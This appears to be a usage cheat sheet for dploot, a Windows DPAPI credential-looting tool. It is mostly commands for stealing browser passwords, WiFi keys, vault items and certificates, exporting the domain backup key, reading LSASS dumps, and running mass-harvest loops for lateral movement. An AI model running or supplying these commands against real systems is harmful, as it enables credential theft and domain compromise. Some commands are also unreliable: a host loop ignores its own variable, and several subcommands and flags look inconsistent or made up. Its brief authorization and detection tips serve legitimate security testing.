dploot is a powerful Python-based tool for extracting Windows DPAPI-protected secrets in domain environments. It can loot browser passwords, WiFi credentials, vault entries, certificates, and other sensitive data by leveraging domain credentials or compromised systems. Essential for post-exploitation and credential extraction scenarios.
# Python 3.7 or higher
python3 --version
# pip package manager
pip3 --version
# For domain operations: impacket library
pip3 install impacket
# For DPAPI decryption capabilities
pip3 install pycryptodome
git clone https://github.com/zblurx/dploot.git
cd dploot
# Install all required packages
pip3 install -r requirements.txt
# Core dependencies
pip3 install impacket pycryptodome
python3 dploot.py --help
python3 dploot.py --version
# Test basic functionality
python3 dploot.py triage
# Local domain credentials
dploot.py -u username -p password -d DOMAIN target_host
# NTHash (pass-the-hash)
dploot.py -u username --hashes :NTHASH target_host
# Kerberos ticket
KRB5CCNAME=/tmp/ticket.ccache dploot.py -k target_host
# Prompt for password interactively
dploot.py -u username -p -d DOMAIN target_host
# Prompt for domain interactively
dploot.py -u username -p -d - target_host
# Local system (requires local admin)
dploot.py local-triage
# LSASS dump file analysis
dploot.py lsass dump.bin
# Use cached masterkeys
dploot.py -m masterkey.key target_host
# Use domain backup key
dploot.py -b backup_key.bin target_host
# Specify multiple keys
dploot.py -m key1.bin -m key2.bin target_host
# Full local system analysis (requires admin)
dploot.py local-triage
# Save output to file
dploot.py local-triage -o output.json
# Include verbose details
dploot.py local-triage -v
# Specific credential type
dploot.py local-triage --chrome
dploot.py local-triage --wifi
# Triage remote system
dploot.py -u user -p pass -d DOMAIN target_host triage
# Export triage results
dploot.py -u user -p pass target_host triage -o triage_results.json
# Triage multiple hosts
for host in host1 host2 host3; do
dploot.py -u user -p pass target_host triage
done
# Returns discovered:
# - Browser profiles and history
# - Vault items
# - WiFi networks
# - Certificates
# - Recent files
# - Network shares
# - Process information
# Extract all Chrome passwords
dploot.py -u user -p pass target_host chrome
# Export to JSON
dploot.py -u user -p pass target_host chrome -o chrome_creds.json
# Specific profile
dploot.py -u user -p pass target_host chrome -p "C:\Users\username\AppData\Local\Google\Chrome\User Data"
# Verbose output with decryption details
dploot.py -u user -p pass target_host chrome -v
# Extract Firefox passwords
dploot.py -u user -p pass target_host firefox
# Specific profile path
dploot.py -u user -p pass target_host firefox --profile "C:\Users\username\AppData\Roaming\Mozilla\Firefox"
# Extract Edge credentials
dploot.py -u user -p pass target_host edge
# Internet Explorer (older systems)
dploot.py -u user -p pass target_host iexplore
# Extract WiFi passwords
dploot.py -u user -p pass target_host wifi
# Show detailed WiFi network info
dploot.py -u user -p pass target_host wifi -v
# Export to CSV
dploot.py -u user -p pass target_host wifi -o wifi_creds.csv
# Extract Windows Vault items
dploot.py -u user -p pass target_host vault
# Vault for specific user
dploot.py -u user -p pass target_host vault --user targetuser
# Include vault passwords
dploot.py -u user -p pass target_host vault --include-passwords
# Extract system certificates
dploot.py -u user -p pass target_host certs
# Export certificates to PEM
dploot.py -u user -p pass target_host certs -o certs/
# Personal store certificates
dploot.py -u user -p pass target_host certs --store Personal
# Machine vs user certs
dploot.py -u user -p pass target_host certs --machine
dploot.py -u user -p pass target_host certs --user
# Extract local system masterkeys
dploot.py local-masterkeys
# Save masterkeys to file
dploot.py local-masterkeys -o masterkeys.bin
# Verbose masterkey discovery
dploot.py local-masterkeys -v
# Extract domain backup key (requires domain admin)
dploot.py -u admin -p pass -d DOMAIN backup-key
# Use backup key to decrypt masterkeys
dploot.py -b backup_key.bin target_host masterkeys
# Extract masterkeys from LSASS
dploot.py lsass dump.bin masterkeys
# User masterkey folder
C:\Users\username\AppData\Roaming\Microsoft\Protect\{SID}
# System masterkey folder
C:\ProgramData\Microsoft\Protect\S-1-5-18
# Export DPAPI domain backup key
dploot.py -u domainadmin -p password -d DOMAIN backup-key
# Save to file
dploot.py -u domainadmin -p password -d DOMAIN backup-key -o dpapi_backup_key.bin
# Via LDAP
dploot.py -u domainadmin -p password -d DOMAIN ldap backup-key
# Decrypt DPAPI blobs with backup key
dploot.py -b dpapi_backup_key.bin target_host chrome
# Decrypt all credentials
dploot.py -b dpapi_backup_key.bin target_host all
# Extract and decrypt in one command
dploot.py -b backup_key.bin target_host triage
# Complete machine triage
dploot.py -u user -p pass target_host machine-triage
# Save detailed report
dploot.py -u user -p pass target_host machine-triage -o machine_report.json
# System information
dploot.py -u user -p pass target_host sysinfo
# Process enumeration
dploot.py -u user -p pass target_host processes
# Network configuration
dploot.py -u user -p pass target_host network
# Scheduled tasks
dploot.py -u user -p pass target_host tasks
# Services
dploot.py -u user -p pass target_host services
# User profile triage
dploot.py -u user -p pass target_host user-triage
# Specific user triage
dploot.py -u user -p pass target_host user-triage --target-user admin
# All users on system
dploot.py -u user -p pass target_host user-triage --all-users
# Get user profiles
dploot.py -u user -p pass target_host users
# User home directories
dploot.py -u user -p pass target_host user-homes
# User environment variables
dploot.py -u user -p pass target_host user-env
# 1. Gain initial access (via exploit, phishing, etc.)
# 2. Execute dploot from compromised system
# Quick credentials grab
dploot.py -u compromised_user -p password -d DOMAIN target_host chrome
dploot.py -u compromised_user -p password -d DOMAIN target_host wifi
dploot.py -u compromised_user -p password -d DOMAIN target_host vault
# 3. Use extracted credentials for lateral movement
# 1. Compromise domain admin account
# 2. Extract domain backup key
dploot.py -u da_user -p da_pass -d DOMAIN backup-key -o da_backup_key.bin
# 3. Use backup key to decrypt ALL domain user secrets
for host in $(cat hostlist.txt); do
dploot.py -b da_backup_key.bin $host triage -o ${host}_triage.json
done
# 4. Extract browser passwords, WiFi creds from all systems
for host in $(cat hostlist.txt); do
dploot.py -b da_backup_key.bin $host chrome -o ${host}_chrome.json
dploot.py -b da_backup_key.bin $host wifi -o ${host}_wifi.json
done
# 1. Dump LSASS from target (requires local admin)
# Using ppldump, lsassy, comsvcs.dll, etc.
# 2. Analyze LSASS dump
dploot.py lsass ./lsass_dump.bin masterkeys
# 3. Extract credentials using dump
dploot.py lsass ./lsass_dump.bin chrome
# 4. Decrypt vault items
dploot.py lsass ./lsass_dump.bin vault
# Discover all user accounts on target
dploot.py -u user -p pass target_host users
# Dump all credentials
dploot.py -u user -p pass target_host all
# Export to offline analysis
dploot.py -u user -p pass target_host triage -o audit.json
# Analyze for compromised accounts, weak passwords, etc.
cat audit.json | grep -i password
# Export to structured JSON
dploot.py -u user -p pass target_host chrome -o output.json
# Pretty-print JSON
dploot.py -u user -p pass target_host chrome -o output.json --pretty
# WiFi credentials as CSV
dploot.py -u user -p pass target_host wifi -f csv -o wifi.csv
# Multiple formats
dploot.py -u user -p pass target_host chrome -f json -o creds.json
# Default: Display results in terminal
dploot.py -u user -p pass target_host chrome
# Verbose output
dploot.py -u user -p pass target_host chrome -v
# Very verbose (debug)
dploot.py -u user -p pass target_host chrome -vv
| Option | Purpose |
|---|
-u | Username for authentication |
-p | Password (or prompt if blank) |
-d | Domain name |
--hashes | NTHash for pass-the-hash |
-b | Domain backup key file path |
-m | Masterkey file path |
-o | Output file path |
-f | Output format (json, csv, txt) |
-v | Verbose output |
--timeout | Connection timeout seconds |
--no-ssl | Disable SSL verification |
-k | Use Kerberos authentication |
dploot.py -u user -p pass target_host chrome
dploot.py -u user -p pass 192.168.1.100 chrome
dploot.py -u user -p pass SERVER01.domain.local chrome
dploot.py -u user -p pass server01.corp.internal chrome
| Issue | Solution |
|---|
| ”Authentication failed” | Verify credentials, ensure account has necessary permissions |
| ”DPAPI blob decryption failed” | Domain backup key may be needed, try with -b option |
| ”Connection refused” | Verify target is online, firewall rules, SMB/RPC ports open |
| ”Access denied to masterkeys” | User may lack permissions, try with higher-privileged account |
| ”No credentials found” | Browser/vault may be locked, try triage mode first |
| ”Masterkey not found” | Local masterkeys missing, use domain backup key approach |
- Always obtain proper authorization before running dploot
- Use domain admin backup key extraction carefully in production
- Document all extracted credentials for audit purposes
- Store exported credential files securely
- Use encryption for sensitive output files
- Rotate compromised credentials immediately
- Monitor for dploot usage in security logs (EventID 4648, 5140)
- Test in lab environment before production deployment
- Keep dploot updated for latest DPAPI attack techniques
- Use with caution in compliance-sensitive environments (PCI, HIPAA, etc.)
# Help for specific commands
dploot.py --help
dploot.py chrome --help
dploot.py vault --help
# Check version and dependencies
dploot.py --version
pip3 show impacket
